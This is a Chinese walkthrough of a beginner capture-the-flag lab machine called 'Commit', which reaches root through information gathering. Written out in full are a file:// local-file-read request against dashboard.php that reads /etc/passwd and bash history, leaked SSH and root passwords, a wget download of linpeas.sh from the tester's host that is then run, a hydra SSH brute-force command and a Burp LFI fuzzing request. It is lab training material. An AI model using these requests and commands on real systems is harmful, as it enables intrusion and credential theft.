群主的Commit靶机测试,主要考察信息收集,适合新手体验~
1. 基本信息
难度:⭐️⭐️
知识点:信息收集,源码,注释,`file协议`,`linux`基础,查看最近修改文件,`BUP`的`LFI模块`爆破
2. 信息收集
Nmap
└─# arp-scan -l | grep PCS
192.168.31.94 08:00:27:12:d1:15 PCS Systemtechnik GmbH
└─# IP=192.168.31.94
└─# nmap -sV -sC -A $IP -Pn
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: DevSecOps Platform v3.0
2222/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:12:D1:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
开放了80、2222端口
目录扫描
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP -x.txt,.php,.html,.zip
└─# dirsearch -u http://$IP -x 403 -e txt,php,html
[19:13:14] 302 - 0B - /dashboard.php -> login.php
[19:13:19] 200 - 655B - /login.php
[19:13:26] 301 - 316B - /uploads -> http://192.168.31.94/uploads/
[19:13:26] 200 - 406B - /uploads/
扫描到login.php,登陆需要账号密码
成功登陆login.php
先访问网页看看,源码藏了账号信息,用lingmj/lingmjnb直接登陆
#view-source:http://192.168.31.94/
<!-- Test Account: lingmj / lingmjnb -->
登陆后有jpg文件上传和ping,测试了半天,不能上传绕过,不能命令注入,继续信息收集
#view-source:http://192.168.31.94/dashboard.php
<!--
$file = $_GET['file'] ?? '';
if (strpos($file, 'file://') === 0) {
readfile($file);
}
源码又藏了信息,通过GET参数获取file的值,然后检查是否以file://开头。如果是,就使用readfile函数读取文件内容,直接使用file协议来访问靶机文件。
file协议测试
#http://192.168.31.94/dashboard.php?file=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
.....
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
lingmj:x:1001:1001:,,,:/home/lingmj:/bin/bash
#http://192.168.31.94/dashboard.php?file=file:///home/lingmj/.bash_history
git init vi .git/config
http://192.168.31.94/dashboard.php?file=file:///home/lingmj/.git/config
#lingmj:10839254acf247b9e456d713d673f9ee
可以读文件,那就把/etc/passwd、/etc/hosts、/home/lingmj/.bashrc、.bash_history等敏感文件挨个读一下,user.txt不能直接读取
/home/lingmj/.bash_history读取到历史命令,发现执行了/home/lingmj/.git/config,看看有啥信息泄漏
获得lingmj权限
/home/lingmj/.bash_history泄露了历史命令,历史命令/home/lingmj/.git/config藏了信息
└─# ssh lingmj@$IP -p 2222
#lingmj:10839254acf247b9e456d713d673f9ee
#简单处理一下
mkdir ~/.ssh
echo 'ssh-rsa'>~/.ssh/authorized_keys
alias ll='ls -artl'
echo "alias ll='ls -artl'" >> ~/.bashrc
source ~/.bashrc
在/home/lingmj/.git/config里读取到ssh的密码
#lingmj:10839254acf247b9e456d713d673f9ee
拿到user.txt
lingmj@Commit:~$ id
uid=1001(lingmj) gid=1001(lingmj) groups=1001(lingmj)
lingmj@Commit:~$ cat user.txt
获得welcome权限
没找到属于welcome的其他文件,搞一个 linpeas.sh测试
lingmj@Commit:~$ wget 192.168.31.126/linpeas.sh
lingmj@Commit:~$ chmod +x linpeas.sh
lingmj@Commit:~$ ./linpeas.sh
lingmj@Commit:~$ dpkg -V
在linpeas.sh没啥有价值发现,找一下welcome相关的文件
find / -user welcome -type f 2>/dev/null
从根目录开始递归搜索所有者为`welcome`的普通文件。
-user welcome:指定用户名为`welcome`。
-type f:仅搜索文件(排除目录)。
#查找文件名中包含“welcome”的文件
find / -type f -name "*welcome*" 2>/dev/null
#在`/home`目录下递归搜索包含“welcome”文本的文件
grep -rl "welcome" /home 2>/dev/null
找了半天user.txt中内容就是welcome的密码
lingmj@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}
lingmj@Commit:~$ su - welcome
Password:#3d442179fc3b320d70689ebb7cb764af
welcome@Commit:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
welcome@Commit:~$ ls -artl
total 24
-rw-r--r-- 1 welcome welcome 807 Apr 11 22:27 .profile
-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc
-rw-r--r-- 1 welcome welcome 220 Apr 11 22:27 .bash_logout
drwxr-xr-x 4 root root 4096 May 17 10:19 ..
-rw-r--r-- 1 root root 44 May 17 10:27 user.txt
lrwxrwxrwx 1 root root 9 May 17 10:38 .bash_history -> /dev/null
drwx------ 2 welcome welcome 4096 May 17 10:38 .
welcome@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}
welcome@Commit:~$ pwd
/home/welcome
获得welcome的密码:3d442179fc3b320d70689ebb7cb764af
看了群主的WP才知道认真翻,能找到passwd、shadow的修改记录,passwd-就藏了welcome的密码,本题拿不拿welcome不影响,因为登上去就该思考为啥ssh端口是2222了,就该去看配置文件改了啥
lingmj@Commit:/etc$ ls -l | grep passwd
-rw-r--r-- 1 root root 1440 May 17 10:20 passwd
-rw-r--r-- 1 root root 1466 May 17 10:27 passwd-
lingmj@Commit:/etc$ ls -l | grep shadow
-rw-r----- 1 root shadow 588 May 17 10:19 gshadow
-rw-r----- 1 root shadow 577 Apr 11 22:27 gshadow-
-rw-r----- 1 root shadow 1075 May 18 08:33 shadow
-rw-r----- 1 root shadow 942 Apr 11 22:27 shadow-
lingmj@Commit:/etc$ diff passwd passwd-
26,27c26,27
< welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
< lingmj:x:1001:1001:,,,:/home/lingmj:/bin/bash
---
> welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash
> lingmj:x:1001:1001::/home/lingmj:/bin/bash
lingmj@Commit:~$ ls -l /etc/ssh/sshd_config
-rw-r--r-- 1 root root 3354 May 17 10:47 /etc/ssh/sshd_config
获得root
没有sudo
welcome@Commit:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for welcome:
Sorry, user welcome may not run sudo on Commit.
再翻一翻文件,其实ssh端口是2222已经提示了去找sshd_config
lingmj@Commit:~$ cat /etc/ssh/sshd_config | grep -E 'root|Root'
# all root login
#PermitRootLogin yes
PermitRootLogin no
# test admin/pass root/root123.
# the setting of "PermitRootLogin without-password".
#ChrootDirectory none
###使用 grep -i可忽略大小写,简化命令为cat /etc/ssh/sshd_config | grep -i root
果然在sshd_config找到了root密码root123.
拿到root.txt
welcome@Commit:~$ su
Password:
root@Commit:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
root@Commit:/home/welcome# cd
root@Commit:~# ls
root.txt
root@Commit:~# cat root.txt
留一个hydra带端口爆破的命令,别想着爆破ssh了,密码都不在rockyou.txt里,而且不允许root登陆
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$IP -s 2222 -V -I -u -f
└─# cat -n /usr/share/wordlists/rockyou.txt | grep root123.
1334411 root123456
4171835 root123west171
4171836 root1234
考点全是信息收集,审题很重要:难度easy!O(∩_∩)O~
附:查看最近修改文件
lingmj@Commit:~$ find / -newer /etc/passwd 2>/dev/null | grep -Pv 'sys|proc|var|run|share|dev|tmp|git'
/root
/usr/bin
/usr/local/bin
/usr/lib
/home/welcome
/home/lingmj
/home/lingmj/.bashrc
/home/lingmj/.bash_history
/home/lingmj/.ssh
/home/lingmj/.ssh/authorized_keys
/home/lingmj/.gnupg
/home/lingmj/.gnupg/trustdb.gpg
/home/lingmj/.gnupg/pubring.kbx
/home/lingmj/.gnupg/private-keys-v1.d
/home/lingmj/user.txt
/etc
/etc/sudoers
/etc/bash_completion.d
/etc/ssh
/etc/ssh/sshd_config
/etc/hosts
/etc/passwd-
/etc/shadow
/etc/hostname
/etc/resolv.conf
附:使用BUP的LFI模块爆破
使用的FUZZ字典
└─# ls -l /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
-rwxrwxrwx 1 root root 22883 11月20日 18:38 /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
爆破模块选取位置
GET /dashboard.php?file=file://§/etc/passwd§ HTTP/1.1
Host: 192.168.31.94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=n0540ni7ggj6o3mjcrnftk1hrj
Connection: close
结果按大小排序,再双击去看响应,就可以找到哪些被改了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
